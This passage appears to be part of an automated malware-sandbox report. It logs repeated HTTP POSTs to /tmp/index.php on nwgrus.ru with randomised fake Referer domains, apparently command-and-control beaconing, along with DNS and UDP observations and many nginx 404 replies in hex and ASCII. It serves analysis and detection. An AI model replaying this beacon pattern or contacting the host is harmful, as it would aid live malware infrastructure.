Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dikpavspdxtej.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://arbcgjbfbud.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dhkilweanmi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rvuyclbvwkrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jqtjcxypgpwnw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bcgwrufdvmvybh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://whtwvxqhovvmi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dyfmjstgfwohx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kwsghrqhqvcg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ccplyqsjscjfnfid.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lqtuaptcsfhre.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dfuclvkubxc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://utvluvviohegxwa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gciivaguamcfaiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pdfnugwkpxwacgj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dxlshxkdsvnwfeb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://snihbsmchoau.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://saahpawkqkmb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nuocycmfgie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vjpuynmuynejyil.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sbfilscmpife.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nylkqgrfrnt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gnxmthbmvqq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yvujkdpmsqqrh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: nwgrus.ru

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhqjnnqelycixny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e9 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to 